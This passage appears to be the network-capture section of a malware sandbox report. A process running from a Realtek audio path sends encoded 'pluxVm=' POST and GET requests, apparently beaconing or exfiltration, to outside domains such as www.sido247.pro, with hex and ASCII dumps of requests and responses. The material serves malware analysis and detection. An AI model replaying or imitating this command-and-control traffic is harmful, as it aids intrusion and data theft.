                                                                                                                                                                                                                                Data Ascii: pluxVm=00x6Nc1OHcgHXcUs2LQG3knqKpJt+nBf7XYibc5zhHlGkg3qVw6k/wNOkAk073S//FQi4JxeN3EX5L5Q6+VgKLj2Hcl8Yd++0H76wnoSp5v/GWXgYCksH7cVFTKrKkkFavTWdvt9B15Gm5szRLxdRaH28r/h5Pb7xzmWDD22KGZucSPmTF6hLo8KIrWMoijlErUcMYlRZTf1rgWIGwb+lc7uXxBCDCPmWu5SxWykQJdyNeiAfrcyx/IbxbLYswutCjMmyveYIKneTjSsgCRtCpOJHipSQ+3vITqEA5yInVkPKEd1c9DLhQl4RlAdp/ymnvNo8Q6FzOrbp9KILaDeZqP1DT3pSPbhjtJUan8M/ZxuN/IIeWtt+KNKtyZWHfusrVJr8nQzv+SEkg8taSFLcZXjf+4lsCdM+kuEafuYdgvYGxTWSPx+0nsq/Yibhp67ALUBM8MjkhZF/MQmk9ikh2BKvXrx1F+L0oZhhTW9ZhFGRH36nPATO1BnCqaCZn+MhnGtpKCzjIy9W7rSxOGumWc5ndV10tgCKKU4XleBE9+0Lum4dSFKng5Ixycpx2lPPnYxpspf9zDDpvrgwCf8ddeY9amyFpSkxvZ+xE83fCNPaWcOs2t0QRJ11GjfusCxVtaWxmnGchdoGrMrlHZzu6xMxjC/n80GgvOyh1Bf8IZc6Tjeul32qRnE5HAFJ2WFmo/8qxhFtuvQwtqg5sR9PkjgwjTpIWSXgQDNdoGZicH9ftkcXN9FpP7xzqnxCdLeuDB1crZSjatAeoLhH4be94wwaY21YjBAmb9b8qsU5vm95yhifwQzHMiclddev9Mn9elo6l7j1l3VVldyT4I0TWZ+FpWGy7k9vGie3f9biIvWFDDZb/0RfQfe6Olp0+9lfWCImYma38sTfhANUZ6XaXau5brk16ZpYd8vIx9ZjZuYJDSVvpS68C92aBXACeV5slJwIMro7oSj5du1jOYBS5w9YKLjRr4JY5nUo9WLk65iN [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.465404987 CET5262OUTData Raw: 69 41 30 78 61 72 62 51 42 48 71 68 42 37 31 35 39 52 36 6d 79 2f 61 35 54 67 45 73 74 76 65 65 66 4e 78 52 71 31 46 56 37 33 56 48 41 49 59 53 68 7a 55 6e 34 45 70 49 79 78 30 45 38 34 33 38 49 44 56 34 33 35 6a 5a 36 2f 33 46 6d 6e 73 42 5a 77
                                                                                                                                                                                                                                Data Ascii: iA0xarbQBHqhB7159R6my/a5TgEstveefNxRq1FV73VHAIYShzUn4EpIyx0E8438IDV435jZ6/3FmnsBZw+5p9U9FzTu5NphdrsMemEZRnUazUcCNzCxjwebvB58V/lmiUOyTy5Ed2qIEJdYEGij7TzRV/svsX1hphTzYUDz2WPriYzu0T74DPEv8DS7gHhL1lKbaz0CIC3zvAe9LvyBMtb9LC29NG4xsGquHIeJMNzkDBMgZT+
                                                                                                                                                                                                                                Dec 3, 2024 14:51:50.668787956 CET558INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:51:50 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                4192.168.11.2049763217.160.0.183807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.183054924 CET416OUTGET /o5mm/?pluxVm=52ZaOoJJHsYFYpcE8OJe6kaaR+Ibp2Nxq28CYNd7tHRxqCukViCUoHxjhmN2/g+W5SkTzZJsaEIA3pVY9O1vDv+SN/8yFpfSlnbOuEouoKz6AG71fS9yZK8=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.kubex.dev
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:51:53.376332045 CET745INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 601
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:51:53 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                5192.168.11.204976484.32.84.32807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:51:58.737869024 CET677OUTPOST /073p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.sido247.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.sido247.pro
                                                                                                                                                                                                                                Referer: http://www.sido247.pro/073p/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 41 75 31 72 45 2b 31 4f 50 38 59 57 6b 4c 58 45 49 4a 4f 43 6c 79 4e 63 79 7a 6b 56 4e 72 62 43 2b 42 32 36 57 56 72 54 32 32 51 7a 4e 69 53 39 70 42 4e 31 4e 31 74 75 45 31 56 4a 49 6c 56 79 48 6d 32 55 64 50 53 6f 45 33 42 79 59 75 67 6b 5a 69 68 30 68 77 6f 67 50 50 41 47 67 55 48 31 30 68 42 71 72 66 4c 41 32 69 4a 50 39 4b 4c 77 4a 43 76 2f 43 42 6d 76 64 71 54 5a 67 62 7a 43 50 55 54 6a 32 6d 2b 56 64 57 66 74 70 67 78 46 54 70 4d 6e 64 73 70 67 4e 38 6b 4e 33 41 67 73 70 62 72 58 56 45 66 31 71 63 6b 42 31 6c 52 69 5a 79 74 56 77 2f 45 6c 65 67 33 48 2f 48 70 6e 63 41 3d 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=Au1rE+1OP8YWkLXEIJOClyNcyzkVNrbC+B26WVrT22QzNiS9pBN1N1tuE1VJIlVyHm2UdPSoE3ByYugkZih0hwogPPAGgUH10hBqrfLA2iJP9KLwJCv/CBmvdqTZgbzCPUTj2m+VdWftpgxFTpMndspgN8kN3AgspbrXVEf1qckB1lRiZytVw/Eleg3H/HpncA==


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                6192.168.11.204976584.32.84.32807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:01.472388983 CET697OUTPOST /073p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.sido247.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.sido247.pro
                                                                                                                                                                                                                                Referer: http://www.sido247.pro/073p/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 41 75 31 72 45 2b 31 4f 50 38 59 57 6b 76 54 45 4b 75 79 43 67 53 4d 75 72 44 6b 56 44 4c 62 47 2b 42 4b 36 57 52 61 49 32 41 41 7a 4e 48 2b 39 75 41 4e 31 42 56 74 75 50 56 56 47 56 56 55 2b 48 6d 36 36 64 4c 53 6f 45 33 56 79 59 72 63 6b 5a 56 31 33 7a 51 6f 69 55 66 41 45 75 30 48 31 30 68 42 71 72 66 66 75 32 69 52 50 39 37 37 77 49 6a 76 67 4c 68 6d 67 4b 61 54 5a 72 37 7a 4f 50 55 54 52 32 6a 6d 2f 64 55 6e 74 70 67 42 46 54 63 77 6b 58 73 70 6d 43 63 6c 73 34 51 67 70 70 4c 66 61 65 31 72 41 75 50 63 32 77 7a 63 34 45 41 5a 78 7a 73 59 58 61 51 4f 76 39 46 6f 38 42 43 66 50 30 65 6d 67 6e 65 4a 30 69 6e 57 63 4f 55 64 57 30 36 30 3d
                                                                                                                                                                                                                                Data Ascii: pluxVm=Au1rE+1OP8YWkvTEKuyCgSMurDkVDLbG+BK6WRaI2AAzNH+9uAN1BVtuPVVGVVU+Hm66dLSoE3VyYrckZV13zQoiUfAEu0H10hBqrffu2iRP977wIjvgLhmgKaTZr7zOPUTR2jm/dUntpgBFTcwkXspmCcls4QgppLfae1rAuPc2wzc4EAZxzsYXaQOv9Fo8BCfP0emgneJ0inWcOUdW060=


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                7192.168.11.204976684.32.84.32807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.206541061 CET7734OUTPOST /073p/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.sido247.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.sido247.pro
                                                                                                                                                                                                                                Referer: http://www.sido247.pro/073p/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Raw: 70 6c 75 78 56 6d 3d 41 75 31 72 45 2b 31 4f 50 38 59 57 6b 76 54 45 4b 75 79 43 67 53 4d 75 72 44 6b 56 44 4c 62 47 2b 42 4b 36 57 52 61 49 32 41 49 7a 4d 78 71 39 6f 6a 6c 31 41 56 74 75 47 31 55 68 56 56 56 6b 48 69 65 32 64 4c 57 53 45 30 74 79 4b 64 6f 6b 66 6b 31 33 35 51 6f 69 4c 50 41 46 67 55 48 73 30 68 52 75 72 66 50 75 32 69 52 50 39 35 6a 77 50 79 76 67 4e 68 6d 76 64 71 54 4e 67 62 7a 69 50 51 32 6b 32 69 53 46 64 45 48 74 70 45 74 46 55 2b 59 6b 56 4d 70 6b 4f 38 6c 4f 34 51 74 35 70 50 47 6c 65 32 33 35 75 4d 4d 32 39 31 4a 36 55 45 42 4d 6c 4f 4d 36 53 69 43 46 7a 31 63 7a 66 31 50 75 33 2b 76 4f 6b 62 4e 59 69 45 53 77 66 6d 78 68 6a 2b 58 76 50 4d 37 66 4e 6a 37 71 42 59 36 7a 53 58 75 4e 44 44 73 59 45 41 49 43 77 76 6d 79 37 42 67 64 31 55 6b 33 48 76 2b 36 44 64 41 43 55 42 50 48 78 69 2f 66 44 6d 49 70 69 4c 36 4d 4a 6e 7a 61 43 6b 43 67 2f 30 55 73 68 55 32 41 31 57 77 65 74 4c 70 45 76 53 66 35 56 78 72 68 43 6d 4a 4a 63 35 7a 41 34 75 7a 6a 53 67 52 62 35 53 6f 52 4a 75 2f [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: pluxVm=Au1rE+1OP8YWkvTEKuyCgSMurDkVDLbG+BK6WRaI2AIzMxq9ojl1AVtuG1UhVVVkHie2dLWSE0tyKdokfk135QoiLPAFgUHs0hRurfPu2iRP95jwPyvgNhmvdqTNgbziPQ2k2iSFdEHtpEtFU+YkVMpkO8lO4Qt5pPGle235uMM291J6UEBMlOM6SiCFz1czf1Pu3+vOkbNYiESwfmxhj+XvPM7fNj7qBY6zSXuNDDsYEAICwvmy7Bgd1Uk3Hv+6DdACUBPHxi/fDmIpiL6MJnzaCkCg/0UshU2A1WwetLpEvSf5VxrhCmJJc5zA4uzjSgRb5SoRJu/SIqo7eGXLkKIXul+7dDPG4SbtMkaY0P4fan31BmxeNlxbkmALxtZPI+G/Hb4+Lysk/31YBbJjFd+gWvrkXThz43g481TydRyiRa+AUR0Yz2VToTx2lSBBGXzlgHvGp14QQ/ktjkxqlmLIBOiimM5WY9gPMWLynG5Ngi4unWPr5uIE34dtni6mP7lpMM+l0OreYHiRZF0K5e86CVxmVXYvj4cRC15MgDP4A8UOxJNZwK+xlFi0F8I5T2r09Zy8+qIRQS6IQKlZ8G/a0unrIBeq2DNtyi1RBhu5MOw6z0HQPSVBZJbIjnG20iFu0cE4qQZlktn/5IrUC6ePHXP5p6a2c9cL/Io0AiAyidtCTfdvKdYj4rRM99wl0cHtlahU/MtpbW28WkYHzE++Gt845YC3BRT/z+kE83w4w0yfMvtJcQk78oXvdjWw8cNHIqhmfRFRrna5WGZaiivrBBbRhj43O5hkJp7XW8ckbNyYzLlN5M91RgxjlHrw1Lvl4/uzGQEL1fb8q/wF3YYJefsQBGpxS17SHjVGpdGN+QuO27t7gw0Udd4mcFInvuyG9NOO25j5GqSDCEYis01vx51aGVjgCuw1PMar4zKTL5ZrkKUbbouzhRW4ScMHb32t/SbdszN10YolZnx0aXnsXcUNTblTlZCUFPq/4eYn9 [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:52:04.206655025 CET112OUTData Raw: 34 57 6e 48 5a 4c 73 39 65 70 47 66 76 41 76 37 6b 56 34 51 4b 42 2f 42 4a 4c 4e 51 44 56 77 61 52 5a 57 2b 53 68 48 55 4f 68 61 38 4e 46 2f 4d 61 64 51 62 45 63 36 52 42 67 59 58 4d 74 6e 31 78 79 57 73 65 79 69 52 77 74 47 6a 32 53 76 30 65 33
                                                                                                                                                                                                                                Data Ascii: 4WnHZLs9epGfvAv7kV4QKB/BJLNQDVwaRZW+ShHUOha8NF/MadQbEc6RBgYXMtn1xyWseyiRwtGj2Sv0e3Mo0pvlHuP+IolM2Lc3wQegE1a1Wg==


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                8192.168.11.204976784.32.84.32807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:06.938968897 CET418OUTGET /073p/?pluxVm=NsdLHLYUe9sblrm0I+Crv144tHMQQbz/4RSieCn+7DwPKByw7jhxCyJ0LTJMQHRDPlmDRdKjKllFY9ccUXh843okMet3hg+QsBhX3tP/6BR9rZiNBzb3ESI=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.sido247.pro
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.150970936 CET1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:52:07 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 9973
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Server: hcdn
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                x-hcdn-request-id: e11158232d6107c78d0906946e7d0c0b-asc-edge6
                                                                                                                                                                                                                                Expires: Tue, 03 Dec 2024 13:52:06 GMT
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151252031 CET1289INData Raw: 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38
                                                                                                                                                                                                                                Data Ascii: argin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:60
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151307106 CET1289INData Raw: 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f
                                                                                                                                                                                                                                Data Ascii: ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;lin
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151351929 CET1289INData Raw: 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74
                                                                                                                                                                                                                                Data Ascii: ze:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151395082 CET1289INData Raw: 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f
                                                                                                                                                                                                                                Data Ascii: -graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidde
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151437998 CET1289INData Raw: 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d
                                                                                                                                                                                                                                Data Ascii: Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151479959 CET1289INData Raw: 54 46 2d 31 36 20 76 61 6c 75 65 22 29 3b 36 35 35 33 35 3c 72 26 26 28 72 2d 3d 36 35 35 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d
                                                                                                                                                                                                                                Data Ascii: TF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;
                                                                                                                                                                                                                                Dec 3, 2024 14:52:07.151530027 CET1289INData Raw: 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 74 66 31 36 2e 65 6e 63 6f 64 65 28 6d 29 7d 2c 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 76 61 72 20 68 2c 66 2c 69 2c 63 2c 75
                                                                                                                                                                                                                                Data Ascii: harCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                9192.168.11.2049768209.74.79.42807488C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Dec 3, 2024 14:52:12.453989029 CET680OUTPOST /dheh/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.glowups.life
